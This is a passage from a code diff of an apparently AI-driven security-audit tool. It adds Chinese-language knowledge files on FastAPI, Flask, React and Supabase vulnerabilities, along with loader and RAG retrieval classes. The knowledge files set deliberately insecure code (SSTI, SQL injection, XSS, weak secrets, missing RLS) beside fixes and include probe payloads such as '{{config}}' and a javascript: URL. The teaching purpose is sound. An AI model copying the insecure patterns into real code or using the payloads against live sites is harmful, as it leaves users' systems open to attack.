||||
async def get_user(user_id: int, current_user: User = Depends(get_current_user)):
|
||||
if user_id != current_user.id and not current_user.is_admin:
|
||||
raise HTTPException(status_code=403)
|
||||
return await User.get(user_id)
|
||||
```
|
||||
|
||||
### 路径遍历
|
||||
```python
|
||||
# 危险
|
||||
@app.get("/files/{filename}")
|
||||
async def get_file(filename: str):
|
||||
return FileResponse(f"/uploads/{filename}")
|
||||
|
||||
# 安全 - 验证路径
|
||||
@app.get("/files/{filename}")
|
||||
async def get_file(filename: str):
|
||||
safe_path = Path("/uploads").resolve() / filename
|
||||
if not str(safe_path.resolve()).startswith(str(Path("/uploads").resolve())):
|
||||
raise HTTPException(status_code=400)
|
||||
return FileResponse(safe_path)
|
||||
```
|
||||
|
||||
### JWT配置问题
|
||||
```python
|
||||
# 危险 - 弱密钥
|
||||
SECRET_KEY = "secret"
|
||||
|
||||
# 危险 - 不验证签名
|
||||
jwt.decode(token, options={"verify_signature": False})
|
||||
|
||||
# 安全
|
||||
SECRET_KEY = os.environ.get("JWT_SECRET_KEY")
|
||||
jwt.decode(token, SECRET_KEY, algorithms=["HS256"])
|
||||
```
|
||||
|
||||
### CORS配置
|
||||
```python
|
||||
# 危险 - 允许所有来源
|
||||
app.add_middleware(
|
||||
CORSMiddleware,
|
||||
allow_origins=["*"],
|
||||
allow_credentials=True, # 危险组合!
|
||||
)
|
||||
|
||||
# 安全 - 指定来源
|
||||
app.add_middleware(
|
||||
CORSMiddleware,
|
||||
allow_origins=["https://example.com"],
|
||||
allow_credentials=True,
|
||||
)
|
||||
```
|
||||
|
||||
## 安全检查清单
|
||||
1. 所有端点是否有适当的认证
|
||||
2. 是否使用Depends进行权限检查
|
||||
3. 文件操作是否验证路径
|
||||
4. SQL查询是否参数化
|
||||
5. CORS配置是否合理
|
||||
6. JWT密钥是否安全存储
|
||||
7. 敏感数据是否在响应中暴露
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,139 @@
|
|||
"""
|
||||
Flask 框架安全知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
FLASK_SECURITY = KnowledgeDocument(
|
||||
id="framework_flask",
|
||||
title="Flask Security",
|
||||
category=KnowledgeCategory.FRAMEWORK,
|
||||
tags=["flask", "python", "web", "jinja2"],
|
||||
content="""
|
||||
Flask 是一个轻量级框架,安全性很大程度上取决于开发者的实现。
|
||||
|
||||
## 常见漏洞模式
|
||||
|
||||
### 模板注入 (SSTI)
|
||||
```python
|
||||
# 危险 - 用户输入作为模板
|
||||
from flask import render_template_string
|
||||
@app.route('/hello')
|
||||
def hello():
|
||||
name = request.args.get('name')
|
||||
return render_template_string(f'Hello {name}!')
|
||||
# 攻击: ?name={{config}}
|
||||
|
||||
# 安全 - 使用参数
|
||||
@app.route('/hello')
|
||||
def hello():
|
||||
name = request.args.get('name')
|
||||
return render_template_string('Hello {{ name }}!', name=name)
|
||||
```
|
||||
|
||||
### XSS
|
||||
```python
|
||||
# 危险 - 禁用转义
|
||||
from markupsafe import Markup
|
||||
return Markup(user_input)
|
||||
|
||||
# 模板中
|
||||
{{ user_input|safe }}
|
||||
|
||||
# 安全 - 默认转义
|
||||
return render_template('page.html', content=user_input)
|
||||
```
|
||||
|
||||
### SQL注入
|
||||
```python
|
||||
# 危险 - 字符串拼接
|
||||
@app.route('/user/<name>')
|
||||
def get_user(name):
|
||||
cursor.execute(f"SELECT * FROM users WHERE name = '{name}'")
|
||||
|
||||
# 安全 - 参数化
|
||||
@app.route('/user/<name>')
|
||||
def get_user(name):
|
||||
cursor.execute("SELECT * FROM users WHERE name = ?", (name,))
|
||||
```
|
||||
|
||||
### 会话安全
|
||||
```python
|
||||
# 危险 - 弱密钥
|
||||
app.secret_key = 'dev'
|
||||
|
||||
# 危险 - 硬编码密钥
|
||||
app.secret_key = 'super-secret-key-12345'
|
||||
|
||||
# 安全
|
||||
app.secret_key = os.environ.get('FLASK_SECRET_KEY')
|
||||
```
|
||||
|
||||
### 文件上传
|
||||
```python
|
||||
# 危险 - 不验证文件
|
||||
@app.route('/upload', methods=['POST'])
|
||||
def upload():
|
||||
file = request.files['file']
|
||||
file.save(f'/uploads/{file.filename}')
|
||||
|
||||
# 安全 - 验证和安全文件名
|
||||
from werkzeug.utils import secure_filename
|
||||
ALLOWED_EXTENSIONS = {'png', 'jpg', 'pdf'}
|
||||
|
||||
def allowed_file(filename):
|
||||
return '.' in filename and \\
|
||||
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
|
||||
|
||||
@app.route('/upload', methods=['POST'])
|
||||
def upload():
|
||||
file = request.files['file']
|
||||
if file and allowed_file(file.filename):
|
||||
filename = secure_filename(file.filename)
|
||||
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
|
||||
```
|
||||
|
||||
### 开放重定向
|
||||
```python
|
||||
# 危险 - 未验证的重定向
|
||||
@app.route('/redirect')
|
||||
def redirect_url():
|
||||
url = request.args.get('url')
|
||||
return redirect(url)
|
||||
|
||||
# 安全 - 验证URL
|
||||
from urllib.parse import urlparse
|
||||
|
||||
@app.route('/redirect')
|
||||
def redirect_url():
|
||||
url = request.args.get('url', '/')
|
||||
# 只允许相对路径或同域名
|
||||
parsed = urlparse(url)
|
||||
if parsed.netloc and parsed.netloc != request.host:
|
||||
return redirect('/')
|
||||
return redirect(url)
|
||||
```
|
||||
|
||||
### Debug模式
|
||||
```python
|
||||
# 危险 - 生产环境开启debug
|
||||
if __name__ == '__main__':
|
||||
app.run(debug=True) # 可能导致RCE
|
||||
|
||||
# 安全
|
||||
if __name__ == '__main__':
|
||||
app.run(debug=os.environ.get('FLASK_DEBUG', 'False') == 'True')
|
||||
```
|
||||
|
||||
## 安全配置
|
||||
```python
|
||||
app.config.update(
|
||||
SECRET_KEY=os.environ.get('SECRET_KEY'),
|
||||
SESSION_COOKIE_SECURE=True,
|
||||
SESSION_COOKIE_HTTPONLY=True,
|
||||
SESSION_COOKIE_SAMESITE='Lax',
|
||||
)
|
||||
```
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,137 @@
|
|||
"""
|
||||
React 框架安全知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
REACT_SECURITY = KnowledgeDocument(
|
||||
id="framework_react",
|
||||
title="React Security",
|
||||
category=KnowledgeCategory.FRAMEWORK,
|
||||
tags=["react", "javascript", "frontend", "jsx"],
|
||||
content="""
|
||||
React 默认对XSS有较好的防护,但仍有一些需要注意的安全问题。
|
||||
|
||||
## 安全特性
|
||||
1. JSX自动转义
|
||||
2. 虚拟DOM隔离
|
||||
|
||||
## 常见漏洞模式
|
||||
|
||||
### dangerouslySetInnerHTML
|
||||
```jsx
|
||||
// 危险 - 直接渲染HTML
|
||||
function Comment({ content }) {
|
||||
return <div dangerouslySetInnerHTML={{ __html: content }} />;
|
||||
}
|
||||
|
||||
// 安全 - 使用DOMPurify
|
||||
import DOMPurify from 'dompurify';
|
||||
function Comment({ content }) {
|
||||
return <div dangerouslySetInnerHTML={{
|
||||
__html: DOMPurify.sanitize(content)
|
||||
}} />;
|
||||
}
|
||||
```
|
||||
|
||||
### href/src注入
|
||||
```jsx
|
||||
// 危险 - javascript:协议
|
||||
function Link({ url }) {
|
||||
return <a href={url}>Click</a>;
|
||||
// 攻击: url = "javascript:alert('XSS')"
|
||||
}
|
||||
|
||||
// 安全 - 验证协议
|
||||
function Link({ url }) {
|
||||
const safeUrl = url.startsWith('http') ? url : '#';
|
||||
return <a href={safeUrl}>Click</a>;
|
||||
}
|
||||
```
|
||||
|
||||
### eval和Function
|
||||
```jsx
|
||||
// 危险
|
||||
function Calculator({ expression }) {
|
||||
const result = eval(expression); // RCE风险
|
||||
return <div>{result}</div>;
|
||||
}
|
||||
|
||||
// 安全 - 使用安全的表达式解析器
|
||||
import { evaluate } from 'mathjs';
|
||||
function Calculator({ expression }) {
|
||||
const result = evaluate(expression);
|
||||
return <div>{result}</div>;
|
||||
}
|
||||
```
|
||||
|
||||
### 服务端渲染(SSR) XSS
|
||||
```jsx
|
||||
// 危险 - Next.js中
|
||||
export async function getServerSideProps({ query }) {
|
||||
return {
|
||||
props: {
|
||||
search: query.q // 未转义
|
||||
}
|
||||
};
|
||||
}
|
||||
|
||||
// 页面中
|
||||
function Page({ search }) {
|
||||
return <script dangerouslySetInnerHTML={{
|
||||
__html: `window.search = "${search}"` // XSS!
|
||||
}} />;
|
||||
}
|
||||
|
||||
// 安全 - 使用JSON序列化
|
||||
function Page({ search }) {
|
||||
return <script dangerouslySetInnerHTML={{
|
||||
__html: `window.search = ${JSON.stringify(search)}`
|
||||
}} />;
|
||||
}
|
||||
```
|
||||
|
||||
### 敏感数据暴露
|
||||
```jsx
|
||||
// 危险 - 前端存储敏感数据
|
||||
localStorage.setItem('token', apiToken);
|
||||
localStorage.setItem('user', JSON.stringify(userData));
|
||||
|
||||
// 危险 - 在状态中存储敏感信息
|
||||
const [creditCard, setCreditCard] = useState(cardNumber);
|
||||
|
||||
// 安全 - 使用HttpOnly Cookie存储token
|
||||
// 敏感数据只在需要时从后端获取
|
||||
```
|
||||
|
||||
### 依赖安全
|
||||
```jsx
|
||||
// 危险 - 使用有漏洞的包
|
||||
import serialize from 'serialize-javascript';
|
||||
// 某些版本有XSS漏洞
|
||||
|
||||
// 安全 - 定期审计
|
||||
// npm audit
|
||||
// yarn audit
|
||||
```
|
||||
|
||||
### 环境变量泄露
|
||||
```jsx
|
||||
// 危险 - 暴露服务端密钥
|
||||
// .env
|
||||
REACT_APP_API_KEY=secret_key // 会被打包到前端!
|
||||
|
||||
// 安全 - 敏感密钥只在服务端使用
|
||||
// 前端只使用公开的配置
|
||||
```
|
||||
|
||||
## 安全最佳实践
|
||||
1. 避免使用dangerouslySetInnerHTML
|
||||
2. 验证所有URL协议
|
||||
3. 不要在前端存储敏感数据
|
||||
4. 使用Content Security Policy
|
||||
5. 定期更新依赖
|
||||
6. 使用TypeScript增强类型安全
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,148 @@
|
|||
"""
|
||||
Supabase 安全知识
|
||||
"""
|
||||
|
||||
from ..base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
|
||||
SUPABASE_SECURITY = KnowledgeDocument(
|
||||
id="framework_supabase",
|
||||
title="Supabase Security",
|
||||
category=KnowledgeCategory.FRAMEWORK,
|
||||
tags=["supabase", "postgresql", "rls", "auth", "baas"],
|
||||
content="""
|
||||
Supabase 是一个开源的Firebase替代品,安全性主要依赖于Row Level Security (RLS)。
|
||||
|
||||
## 核心安全机制
|
||||
1. Row Level Security (RLS)
|
||||
2. JWT认证
|
||||
3. PostgreSQL权限系统
|
||||
|
||||
## 常见漏洞模式
|
||||
|
||||
### RLS未启用
|
||||
```sql
|
||||
-- 危险 - 表没有启用RLS
|
||||
CREATE TABLE posts (
|
||||
id SERIAL PRIMARY KEY,
|
||||
user_id UUID,
|
||||
content TEXT
|
||||
);
|
||||
-- 任何人都可以访问所有数据!
|
||||
|
||||
-- 安全 - 启用RLS
|
||||
ALTER TABLE posts ENABLE ROW LEVEL SECURITY;
|
||||
|
||||
CREATE POLICY "Users can only see their own posts"
|
||||
ON posts FOR SELECT
|
||||
USING (auth.uid() = user_id);
|
||||
```
|
||||
|
||||
### RLS策略不完整
|
||||
```sql
|
||||
-- 危险 - 只有SELECT策略
|
||||
CREATE POLICY "select_policy" ON posts FOR SELECT
|
||||
USING (auth.uid() = user_id);
|
||||
-- INSERT/UPDATE/DELETE没有策略,可能被绕过
|
||||
|
||||
-- 安全 - 完整的CRUD策略
|
||||
CREATE POLICY "insert_policy" ON posts FOR INSERT
|
||||
WITH CHECK (auth.uid() = user_id);
|
||||
|
||||
CREATE POLICY "update_policy" ON posts FOR UPDATE
|
||||
USING (auth.uid() = user_id);
|
||||
|
||||
CREATE POLICY "delete_policy" ON posts FOR DELETE
|
||||
USING (auth.uid() = user_id);
|
||||
```
|
||||
|
||||
### 服务端密钥泄露
|
||||
```javascript
|
||||
// 危险 - 在前端使用service_role密钥
|
||||
const supabase = createClient(url, 'service_role_key');
|
||||
// service_role绕过RLS!
|
||||
|
||||
// 安全 - 前端只使用anon key
|
||||
const supabase = createClient(url, 'anon_key');
|
||||
```
|
||||
|
||||
### 不安全的函数
|
||||
```sql
|
||||
-- 危险 - SECURITY DEFINER函数
|
||||
CREATE FUNCTION get_all_users()
|
||||
RETURNS SETOF users
|
||||
LANGUAGE sql
|
||||
SECURITY DEFINER -- 以函数所有者权限执行
|
||||
AS $$
|
||||
SELECT * FROM users;
|
||||
$$;
|
||||
|
||||
-- 安全 - 使用SECURITY INVOKER或添加检查
|
||||
CREATE FUNCTION get_user_data(target_user_id UUID)
|
||||
RETURNS SETOF users
|
||||
LANGUAGE sql
|
||||
SECURITY INVOKER
|
||||
AS $$
|
||||
SELECT * FROM users WHERE id = target_user_id;
|
||||
$$;
|
||||
```
|
||||
|
||||
### 存储桶权限
|
||||
```sql
|
||||
-- 危险 - 公开存储桶
|
||||
INSERT INTO storage.buckets (id, name, public)
|
||||
VALUES ('uploads', 'uploads', true);
|
||||
-- 任何人都可以访问所有文件
|
||||
|
||||
-- 安全 - 私有存储桶 + RLS
|
||||
INSERT INTO storage.buckets (id, name, public)
|
||||
VALUES ('uploads', 'uploads', false);
|
||||
|
||||
CREATE POLICY "Users can access own files"
|
||||
ON storage.objects FOR SELECT
|
||||
USING (auth.uid()::text = (storage.foldername(name))[1]);
|
||||
```
|
||||
|
||||
### JWT验证绕过
|
||||
```javascript
|
||||
// 危险 - 不验证JWT
|
||||
const { data } = await supabase
|
||||
.from('posts')
|
||||
.select('*')
|
||||
.eq('user_id', userIdFromRequest); // 用户可以伪造
|
||||
|
||||
// 安全 - 使用auth.uid()
|
||||
// RLS策略中使用auth.uid()自动从JWT获取用户ID
|
||||
```
|
||||
|
||||
### Edge Functions安全
|
||||
```typescript
|
||||
// 危险 - 不验证请求来源
|
||||
Deno.serve(async (req) => {
|
||||
const { userId } = await req.json();
|
||||
// 直接使用用户提供的userId
|
||||
});
|
||||
|
||||
// 安全 - 从JWT获取用户
|
||||
import { createClient } from '@supabase/supabase-js';
|
||||
|
||||
Deno.serve(async (req) => {
|
||||
const authHeader = req.headers.get('Authorization');
|
||||
const supabase = createClient(url, anonKey, {
|
||||
global: { headers: { Authorization: authHeader } }
|
||||
});
|
||||
const { data: { user } } = await supabase.auth.getUser();
|
||||
// 使用验证过的user.id
|
||||
});
|
||||
```
|
||||
|
||||
## 安全检查清单
|
||||
1. 所有表都启用了RLS
|
||||
2. 每个表都有完整的CRUD策略
|
||||
3. 前端只使用anon key
|
||||
4. service_role key只在服务端使用
|
||||
5. 存储桶有适当的访问策略
|
||||
6. 函数使用SECURITY INVOKER
|
||||
7. Edge Functions验证JWT
|
||||
""",
|
||||
)
|
||||
|
|
@ -0,0 +1,207 @@
|
|||
"""
|
||||
知识加载器 - 基于RAG的知识模块加载
|
||||
|
||||
将安全知识集成到Agent的系统提示词中
|
||||
"""
|
||||
|
||||
import logging
|
||||
from typing import List, Dict, Any, Optional
|
||||
|
||||
from .base import KnowledgeCategory
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class KnowledgeLoader:
|
||||
"""
|
||||
知识加载器
|
||||
|
||||
负责将RAG检索的知识集成到Agent系统提示词中
|
||||
"""
|
||||
|
||||
def __init__(self, rag=None):
|
||||
# 延迟导入避免循环依赖
|
||||
if rag is None:
|
||||
from .rag_knowledge import security_knowledge_rag
|
||||
rag = security_knowledge_rag
|
||||
self._rag = rag
|
||||
|
||||
async def load_module(self, module_name: str) -> str:
|
||||
"""
|
||||
加载单个知识模块
|
||||
|
||||
Args:
|
||||
module_name: 模块名称(如sql_injection, xss等)
|
||||
|
||||
Returns:
|
||||
模块内容
|
||||
"""
|
||||
knowledge = await self._rag.get_vulnerability_knowledge(module_name)
|
||||
if knowledge:
|
||||
return knowledge.get("content", "")
|
||||
return ""
|
||||
|
||||
async def load_modules(self, module_names: List[str]) -> Dict[str, str]:
|
||||
"""
|
||||
批量加载知识模块
|
||||
|
||||
Args:
|
||||
module_names: 模块名称列表
|
||||
|
||||
Returns:
|
||||
模块名称到内容的映射
|
||||
"""
|
||||
result = {}
|
||||
for name in module_names:
|
||||
content = await self.load_module(name)
|
||||
if content:
|
||||
result[name] = content
|
||||
return result
|
||||
|
||||
async def search_knowledge(
|
||||
self,
|
||||
query: str,
|
||||
top_k: int = 3,
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""
|
||||
搜索相关知识
|
||||
|
||||
Args:
|
||||
query: 搜索查询
|
||||
top_k: 返回数量
|
||||
|
||||
Returns:
|
||||
相关知识列表
|
||||
"""
|
||||
return await self._rag.search(query, top_k=top_k)
|
||||
|
||||
def build_system_prompt_with_modules(
|
||||
self,
|
||||
base_prompt: str,
|
||||
module_names: List[str],
|
||||
) -> str:
|
||||
"""
|
||||
构建包含知识模块的系统提示词(同步版本,使用内置知识)
|
||||
|
||||
Args:
|
||||
base_prompt: 基础系统提示词
|
||||
module_names: 要加载的模块名称列表
|
||||
|
||||
Returns:
|
||||
增强后的系统提示词
|
||||
"""
|
||||
if not module_names:
|
||||
return base_prompt
|
||||
|
||||
# 使用内置知识(同步)
|
||||
knowledge_sections = []
|
||||
for name in module_names:
|
||||
knowledge = self._get_builtin_knowledge(name)
|
||||
if knowledge:
|
||||
knowledge_sections.append(f"### {knowledge['title']}\n{knowledge['content']}")
|
||||
|
||||
if not knowledge_sections:
|
||||
return base_prompt
|
||||
|
||||
knowledge_text = "\n\n".join(knowledge_sections)
|
||||
|
||||
return f"""{base_prompt}
|
||||
|
||||
---
|
||||
## 专业安全知识参考
|
||||
|
||||
以下是与当前任务相关的安全知识,请在分析时参考:
|
||||
|
||||
{knowledge_text}
|
||||
|
||||
---
|
||||
"""
|
||||
|
||||
def _get_builtin_knowledge(self, module_name: str) -> Optional[Dict[str, Any]]:
|
||||
"""获取内置知识(同步)"""
|
||||
module_name_normalized = module_name.lower().replace("-", "_").replace(" ", "_")
|
||||
|
||||
for doc in self._rag._builtin_knowledge:
|
||||
if doc.id == f"vuln_{module_name_normalized}" or doc.id == module_name_normalized:
|
||||
return doc.to_dict()
|
||||
|
||||
# 模糊匹配
|
||||
for doc in self._rag._builtin_knowledge:
|
||||
if module_name_normalized in doc.id or any(
|
||||
module_name_normalized in tag for tag in doc.tags
|
||||
):
|
||||
return doc.to_dict()
|
||||
|
||||
return None
|
||||
|
||||
def get_available_modules(self) -> List[str]:
|
||||
"""获取所有可用的知识模块"""
|
||||
return self._rag.get_all_vulnerability_types()
|
||||
|
||||
def get_all_module_names(self) -> List[str]:
|
||||
"""获取所有模块名称(包括漏洞和框架)"""
|
||||
vuln_types = self._rag.get_all_vulnerability_types()
|
||||
frameworks = self._rag.get_all_frameworks()
|
||||
return vuln_types + frameworks
|
||||
|
||||
def validate_modules(self, module_names: List[str]) -> Dict[str, List[str]]:
|
||||
"""
|
||||
验证知识模块是否存在
|
||||
|
||||
Args:
|
||||
module_names: 要验证的模块名称列表
|
||||
|
||||
Returns:
|
||||
{"valid": [...], "invalid": [...]}
|
||||
"""
|
||||
all_modules = self.get_all_module_names()
|
||||
all_modules_normalized = {m.lower().replace("-", "_") for m in all_modules}
|
||||
|
||||
# 添加常见别名
|
||||
aliases = {
|
||||
"sql": "sql_injection",
|
||||
"sqli": "sql_injection",
|
||||
"xss": "xss_reflected",
|
||||
"auth": "auth_bypass",
|
||||
"idor": "idor",
|
||||
"ssrf": "ssrf",
|
||||
"rce": "command_injection",
|
||||
"lfi": "path_traversal",
|
||||
"xxe": "xxe",
|
||||
}
|
||||
|
||||
valid = []
|
||||
invalid = []
|
||||
|
||||
for name in module_names:
|
||||
name_normalized = name.lower().replace("-", "_").replace(" ", "_")
|
||||
|
||||
# 检查直接匹配
|
||||
if name_normalized in all_modules_normalized:
|
||||
valid.append(name)
|
||||
# 检查别名
|
||||
elif name_normalized in aliases:
|
||||
valid.append(aliases[name_normalized])
|
||||
# 检查部分匹配
|
||||
elif any(name_normalized in m for m in all_modules_normalized):
|
||||
valid.append(name)
|
||||
else:
|
||||
invalid.append(name)
|
||||
|
||||
return {"valid": valid, "invalid": invalid}
|
||||
|
||||
|
||||
# 全局实例
|
||||
knowledge_loader = KnowledgeLoader()
|
||||
|
||||
|
||||
# 便捷函数
|
||||
def get_available_modules() -> List[str]:
|
||||
"""获取所有可用的知识模块"""
|
||||
return knowledge_loader.get_available_modules()
|
||||
|
||||
|
||||
def get_module_content(module_name: str) -> Optional[str]:
|
||||
"""获取模块内容(同步)"""
|
||||
knowledge = knowledge_loader._get_builtin_knowledge(module_name)
|
||||
return knowledge.get("content") if knowledge else None
|
||||
|
|
@ -0,0 +1,322 @@
|
|||
"""
|
||||
基于RAG的安全知识检索系统
|
||||
|
||||
利用现有的RAG模块实现安全知识的向量检索
|
||||
"""
|
||||
|
||||
import logging
|
||||
from typing import List, Dict, Any, Optional
|
||||
|
||||
from .base import KnowledgeDocument, KnowledgeCategory
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class SecurityKnowledgeRAG:
|
||||
"""
|
||||
安全知识RAG检索系统
|
||||
|
||||
使用现有的RAG模块进行向量检索
|
||||
"""
|
||||
|
||||
COLLECTION_NAME = "security_knowledge"
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
persist_directory: Optional[str] = None,
|
||||
):
|
||||
self.persist_directory = persist_directory
|
||||
self._indexer = None
|
||||
self._retriever = None
|
||||
self._initialized = False
|
||||
|
||||
# 内置知识库 - 从模块化文件加载
|
||||
self._builtin_knowledge = self._load_builtin_knowledge()
|
||||
|
||||
async def initialize(self):
|
||||
"""初始化RAG组件"""
|
||||
if self._initialized:
|
||||
return
|
||||
|
||||
try:
|
||||
from ...rag import CodeIndexer, CodeRetriever, EmbeddingService
|
||||
|
||||
embedding_service = EmbeddingService()
|
||||
|
||||
self._indexer = CodeIndexer(
|
||||
collection_name=self.COLLECTION_NAME,
|
||||
embedding_service=embedding_service,
|
||||
persist_directory=self.persist_directory,
|
||||
)
|
||||
|
||||
self._retriever = CodeRetriever(
|
||||
collection_name=self.COLLECTION_NAME,
|
||||
embedding_service=embedding_service,
|
||||
persist_directory=self.persist_directory,
|
||||
)
|
||||
|
||||
await self._indexer.initialize()
|
||||
await self._retriever.initialize()
|
||||
|
||||
# 检查是否需要索引内置知识
|
||||
count = await self._indexer.get_chunk_count()
|
||||
if count == 0:
|
||||
await self._index_builtin_knowledge()
|
||||
|
||||
self._initialized = True
|
||||
logger.info("SecurityKnowledgeRAG initialized")
|
||||
|
||||
except Exception as e:
|
||||
logger.warning(f"Failed to initialize RAG: {e}, using fallback")
|
||||
self._initialized = True # 标记为已初始化,使用fallback
|
||||
|
||||
def _load_builtin_knowledge(self) -> List[KnowledgeDocument]:
|
||||
"""从模块化文件加载内置安全知识"""
|
||||
all_docs = []
|
||||
|
||||
# 加载漏洞知识
|
||||
try:
|
||||
from .vulnerabilities import ALL_VULNERABILITY_DOCS
|
||||
all_docs.extend(ALL_VULNERABILITY_DOCS)
|
||||
logger.debug(f"Loaded {len(ALL_VULNERABILITY_DOCS)} vulnerability docs")
|
||||
except ImportError as e:
|
||||
logger.warning(f"Failed to load vulnerability docs: {e}")
|
||||
|
||||
# 加载框架知识
|
||||
try:
|
||||
from .frameworks import ALL_FRAMEWORK_DOCS
|
||||
all_docs.extend(ALL_FRAMEWORK_DOCS)
|
||||
logger.debug(f"Loaded {len(ALL_FRAMEWORK_DOCS)} framework docs")
|
||||
except ImportError as e:
|
||||
logger.warning(f"Failed to load framework docs: {e}")
|
||||
|
||||
logger.info(f"Total knowledge documents loaded: {len(all_docs)}")
|
||||
return all_docs
|
||||
|
||||
async def _index_builtin_knowledge(self):
|
||||
"""索引内置知识到向量数据库"""
|
||||
if not self._indexer:
|
||||
return
|
||||
|
||||
logger.info("Indexing builtin security knowledge...")
|
||||
|
||||
# 转换为RAG可索引的格式
|
||||
files = []
|
||||
for doc in self._builtin_knowledge:
|
||||
files.append({
|
||||
"path": f"knowledge/{doc.category.value}/{doc.id}.md",
|
||||
"content": doc.to_embedding_text(),
|
||||
})
|
||||
|
||||
async for progress in self._indexer.index_files(files, base_path="knowledge"):
|
||||
pass
|
||||
|
||||
logger.info(f"Indexed {len(files)} knowledge documents")
|
||||
|
||||
async def search(
|
||||
self,
|
||||
query: str,
|
||||
category: Optional[KnowledgeCategory] = None,
|
||||
top_k: int = 5,
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""
|
||||
搜索安全知识
|
||||
|
||||
Args:
|
||||
query: 搜索查询
|
||||
category: 知识类别过滤
|
||||
top_k: 返回数量
|
||||
|
||||
Returns:
|
||||
匹配的知识文档列表
|
||||
"""
|
||||
await self.initialize()
|
||||
|
||||
# 如果RAG可用,使用向量检索
|
||||
if self._retriever:
|
||||
try:
|
||||
results = await self._retriever.retrieve(
|
||||
query=query,
|
||||
top_k=top_k,
|
||||
)
|
||||
|
||||
return [
|
||||
{
|
||||
"id": r.chunk_id,
|
||||
"content": r.content,
|
||||
"score": r.score,
|
||||
"file_path": r.file_path,
|
||||
}
|
||||
for r in results
|
||||
]
|
||||
except Exception as e:
|
||||
logger.warning(f"RAG search failed: {e}, using fallback")
|
||||
|
||||
# Fallback: 简单关键词匹配
|
||||
return self._fallback_search(query, category, top_k)
|
||||
|
||||
def _fallback_search(
|
||||
self,
|
||||
query: str,
|
||||
category: Optional[KnowledgeCategory],
|
||||
top_k: int,
|
||||
) -> List[Dict[str, Any]]:
|
||||
"""简单的关键词匹配搜索(fallback)"""
|
||||
query_lower = query.lower()
|
||||
query_terms = query_lower.split()
|
||||
results = []
|
||||
|
||||
for doc in self._builtin_knowledge:
|
||||
if category and doc.category != category:
|
||||
continue
|
||||
|
||||
# 计算匹配分数
|
||||
score = 0
|
||||
content_lower = doc.content.lower()
|
||||
title_lower = doc.title.lower()
|
||||
|
||||
# 标题匹配权重更高
|
||||
for term in query_terms:
|
||||
if term in title_lower:
|
||||
score += 0.3
|
||||
if term in content_lower:
|
||||
score += 0.1
|
||||
|
||||
# 完整查询匹配
|
||||
if query_lower in title_lower:
|
||||
score += 0.5
|
||||
if query_lower in content_lower:
|
||||
score += 0.2
|
||||
|
||||
# 标签匹配
|
||||
for tag in doc.tags:
|
||||
if query_lower in tag.lower() or any(t in tag.lower() for t in query_terms):
|
||||
score += 0.15
|
||||
|
||||
# CWE/OWASP匹配
|
||||
for cwe in doc.cwe_ids:
|
||||
if query_lower in cwe.lower():
|
||||
score += 0.25
|
||||
for owasp in doc.owasp_ids:
|
||||
if query_lower in owasp.lower():
|
||||
score += 0.25
|
||||
|
||||
if score > 0:
|
||||
results.append({
|
||||
"id": doc.id,
|
||||
"title": doc.title,
|
||||
"content": doc.content,
|
||||
"category": doc.category.value,
|
||||
"score": min(score, 1.0),
|
||||
"tags": doc.tags,
|
||||
"cwe_ids": doc.cwe_ids,
|
||||
"severity": doc.severity,
|
||||
})
|
||||
|
||||
# 按分数排序
|
||||
results.sort(key=lambda x: x["score"], reverse=True)
|
||||
return results[:top_k]
|
||||
|
||||
async def get_vulnerability_knowledge(
|
||||
self,
|
||||
vuln_type: str,
|
||||
) -> Optional[Dict[str, Any]]:
|
||||
"""
|
||||
获取特定漏洞类型的知识
|
||||
|
||||
Args:
|
||||
vuln_type: 漏洞类型(如sql_injection, xss等)
|
||||
|
||||
Returns:
|
||||
漏洞知识文档
|
||||
"""
|
||||
# 标准化漏洞类型名称
|
||||
vuln_type_normalized = vuln_type.lower().replace("-", "_").replace(" ", "_")
|
||||
|
||||
# 先尝试精确匹配
|
||||
for doc in self._builtin_knowledge:
|
||||
if doc.id == f"vuln_{vuln_type_normalized}" or doc.id == vuln_type_normalized:
|
||||
return doc.to_dict()
|
||||
|
||||
# 尝试部分匹配
|
||||
for doc in self._builtin_knowledge:
|
||||
if vuln_type_normalized in doc.id:
|
||||
return doc.to_dict()
|
||||
|
||||
# 使用搜索
|
||||
results = await self.search(vuln_type, top_k=1)
|
||||
return results[0] if results else None
|
||||
|
||||
async def get_framework_knowledge(
|
||||
self,
|
||||
framework: str,
|
||||
) -> Optional[Dict[str, Any]]:
|
||||
"""
|
||||
获取特定框架的安全知识
|
||||
|
||||
Args:
|
||||
framework: 框架名称(如fastapi, django等)
|
||||
|
||||
Returns:
|
||||
框架安全知识文档
|
||||
"""
|
||||
framework_normalized = framework.lower().replace("-", "_").replace(" ", "_")
|
||||
|
||||
for doc in self._builtin_knowledge:
|
||||
if doc.category == KnowledgeCategory.FRAMEWORK:
|
||||
if doc.id == f"framework_{framework_normalized}" or framework_normalized in doc.id:
|
||||
return doc.to_dict()
|
||||
|
||||
# 使用搜索
|
||||
results = await self.search(framework, category=KnowledgeCategory.FRAMEWORK, top_k=1)
|
||||
return results[0] if results else None
|
||||
|
||||
def get_all_vulnerability_types(self) -> List[str]:
|
||||
"""获取所有支持的漏洞类型"""
|
||||
return [
|
||||
doc.id.replace("vuln_", "")
|
||||
for doc in self._builtin_knowledge
|
||||
if doc.category == KnowledgeCategory.VULNERABILITY
|
||||
]
|
||||
|
||||
def get_all_frameworks(self) -> List[str]:
|
||||
"""获取所有支持的框架"""
|
||||
return [
|
||||
doc.id.replace("framework_", "")
|
||||
for doc in self._builtin_knowledge
|
||||
if doc.category == KnowledgeCategory.FRAMEWORK
|
||||
]
|
||||
|
||||
def get_knowledge_by_tags(self, tags: List[str]) -> List[Dict[str, Any]]:
|
||||
"""根据标签获取知识"""
|
||||
results = []
|
||||
